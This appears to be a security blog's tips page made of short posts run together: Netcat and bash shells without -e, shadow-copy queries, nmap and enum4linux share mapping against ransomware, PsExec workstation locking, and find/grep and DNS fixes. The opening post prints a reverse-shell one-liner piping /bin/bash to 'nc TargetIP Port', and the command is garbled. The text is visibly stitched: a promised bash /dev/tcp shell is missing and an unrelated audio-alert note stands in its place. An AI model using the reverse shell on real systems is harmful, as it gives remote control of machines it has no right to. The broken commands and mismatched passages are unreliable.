A Passion for Security

Tips & Tricks

Netcat backdoor without -e (execute option)

Netcat is installed by default on a lot of Linux systems, however we are seeing more and more Netcat’s are compiled without the -e option. The -e options allows us to execute and serve an executable over the connecting socket. It is incredibly handy feature, both for controlling an executable over a network connection, or for creating simple backdoors. Thus as a security measure, Netcat is sometimes compiled without the -e option. In fact, if you want to compile Netcat with the -e option, you need to compile it with the option GAPING_SECURITY_HOLE.

While the -e option can be a concern from a security point of view, it is often trivially bypassed.

Below are examples that servers shells without the execute option. In the examples, a special Linux pipe type of file is used. This is a FIFO type of file structure, what goes first in, goes first out. Quite handy for pushing data in orderly fashion.

1

2

mknodppipe

/bin/bash0<pipe|nc TargetIP Port

I don’t care what you just showed me, I dont have Netcat!

Bash can do arbitrary TCP and UDP connections to wherever you want, so a Netcat similar reverse shell would be:

This handy little command reminds me by audio when my computer is back online. I just had a 30 minute Internett outage, and it was nice to get right back to my seat when my computer started bleeping out alarms.

This leaves no good marks in the registry for us to audit, and I think the best way to detect this is to query machines where you know you have Volume Shadow Copies enabled, to see if they have any backups stored. To query for this information we can use wmic, another built in command which supports reaching network attached machines:

wmic /node:@ip.txt shadowcopy list brief

This little command will run off every IP address in the file ip.txt and return the respective backup volumes.

With all the ransomware hitting everyone, everywhere, I decided to share my scripts on how I map the attack surface of internal threats, and subsequently ransomware / cryptolocker. It is not fully automated yet, but hopefully sharing this will give people the right ideas, and perhaps some might even automate it. For now, this only works for file sharing using Windows default file sharing. PS: I realize this is far from perfect, and probably should all be doable with a simple nmap script, however this is what I use in conjunction with some other work.

A typical scenario for using these scripts and commands are for users that should not have access to a bunch of files on your file-servers. Close down those shares and permissions before the inevitable happens, and the files are stolen and encrypted.

We start off with scanning every host who has port 445 open (Microsoft SMB):

nmap -p 445 -T4 -oG 445.txt 192.168.1.1-254

Replace the IP address range with whatever suits your network. Next, we grep out the hosts which are relevant for checking which file shares they expose.

cat tmp/445.txt | grep “445/open” | cut -d ” ” -f 2 > hosts.txt

With the relevant hosts in a separate file, lets use enum4linux to enumerate all the potential shares on these servers. Remember to add the username and password of the account you want to use for the mapping.

This produces a file shares.txt containing potential shares we want to investigate and close down. Now we’ll edit the following script and put it in a bat file, and then let it work. Remember to add the necessary credentials and domain information.

You might need to check file hashes across multiple directories and across multiple algorithms, e.g. verifying all files hashsums against both MD5 and SHA1. This is an example of how to accomplish such task using Powershell.

Sometimes you have to throw someone off a terminal, but at the same time preserve the evidence on the terminal. For example if someone is using a terminal to hack something, and you need to secure the running terminals to capture the commands that has been run. It is quite simple to accomplish this, as the process below demonstrates.

First, change the target account’s AD password. This will prevent them from logging back in

Next, target the terminal with psexec and use rundll32 to execute user32.dll with the LockWorkStation function. This will trigger the account lock. The following command can be tweaked for your purposes: PsExec.exe \\<ip> -d -u <domain>\Administrator -i cmd.exe /c “C:\windows\system32\rundll32.exe user32.dll, LockWorkStation”

Now it’s time to sieze the terminal. Make sure you are standing by ready for this, as the victim could be distressed and shut down his workstation, essentially removing evidence.

This concept can be expanded further, as Darryl Griffiths pointed out to me on LinkedIn. Coupling the initial idea of locking the workstation with AD Group Policies to modify the Power settings on the target workstation, one can even prevent the machine from shutting down, e.g. when the power button is clicked or the laptop lid is turned off. The Power Management in Windows normally allows this type of overriding the functionality of the power button, and more can be read about this concept in the following TechNet article: https://blogs.technet.microsoft.com/askds/2008/03/21/managing-power-with-group-policy-part-3-of-3/

Sometimes you have to find interesting files, then grep through those specific files dynamically. With Linux this is as easy as:

find . -name <file> -exec grep -i -H <match> {} \;

This will simply recursively look for files you want to find, e.g. *.txt, and for each file found, grep that file for whatever matching content you want to find. Additional interesting things to do with this is to grep with regex, or use the find command to further filter for specific types of files.

This is likely due to your DHCP settings are pushed out with a SearchDomain for <whatever>.local. Edit your /etc/resolv.conf and remove the line dictating the SearchDomain, and you should have a huge boost in speed!